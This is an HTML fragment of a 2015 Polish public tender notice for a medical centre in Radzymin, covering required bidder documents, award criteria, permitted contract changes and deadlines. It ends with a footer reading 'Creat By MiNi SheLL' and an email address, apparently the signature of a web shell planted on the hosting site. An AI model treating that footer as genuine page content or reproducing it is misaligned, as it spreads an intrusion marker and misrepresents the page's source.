<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełniony formularz ofertowy, wypełniony formularz kosztów wykonania zamówienia. 2) Zestawienia użytych materiałów, wyrobów, urządzeń , 3) Oświadczenie o zapoznaniu się z SIWZ i przyjęciu jej bez zastrzeżeń. 4) Dowód wpłaty wadium (wadium wnoszone w innej formie niż pieniężna należy złożyć do siedziby Zamawiającego - Sekretariat Dyrektora do dnia składania ofert do godziny składania ofert. Natomiast do oferty należy dołączyć kserokopię poświadczoną za zgodność z oryginałem ). 5) Pełnomocnictwo do podpisania oferty oraz składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona. Zamawiający wymaga przedłożenia oryginału pełnomocnictwa lub kopii poświadczonej za zgodność z oryginałem przez notariusza. Pełnomocnictwo winno wskazywać datę jego wystawienia oraz okres, na który zostało udzielone. Brak tego okresu zamawiający odczyta jako pełnomocnictwo wystawione na czas nieokreślony. 6) Wykaz części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom (Jeżeli dotyczy) 7) Nazwy (firmy) proponowanych podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust.2 b Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 Pzp. (Jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji zamówienia - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	zmiany podwykonawcy, zmiany zakresu podwykonywanych robót, lub rezygnacji z podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy, po uprzedniej akceptacji Zamawiającego. Jeżeli zamiana lub rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia,
b)	zmiany rodzaju materiałów, z których będą wykonywane roboty budowlane, 
w przypadku zaprzestania produkcji materiału bądź wycofania i wprowadzenia przez producenta materiału o parametrach i cechach użytkowych takich samych lub lepszych lub jakościowo wyższych lub technologicznie nowszych. Zmiana rodzaju materiałów wymaga pisemnej akceptacji Zamawiającego, uzyskanie której wymaga przedstawienia przez Wykonawcę szczegółowego uzasadnienia zmiany wraz z pisemnym potwierdzeniem producenta parametrów nowych materiałów. Zaproponowane nowe materiały nie mogą powodować podwyższenia wynagrodzenia określonego w umowie oraz nie mogą powodować podwyższenia cen jednostkowych poszczególnych pozycji kosztorysowych, 
c)	wydłużenia terminu realizacji robót w przypadku wstrzymania przez Zamawiającego wykonania robót o okres nie dłuższy niż okres wstrzymania robót;
d)	wszelkie zmiany dostosowujące umowę do zmienionych przepisów, 
w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa, mających wpływ na realizację umowy;
e)	inne zmiany pod warunkiem, że zmiany te będą korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cmradzymin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Medyczne im. Bitwy Warszawskiej 1920r. w Radzyminie- SPZZOZ, ul. Konstytucji 3 Maja 17, 05-250 Radzymin, budynek Przychodni II piętro pok. 221..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2015 godzina 10:30, miejsce: Centrum Medyczne im. Bitwy Warszawskiej 1920r. w Radzyminie- SPZZOZ, ul. Konstytucji 3 Maja 17, 05-250 Radzymin, budynek Przychodni II piętro pok. 221..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com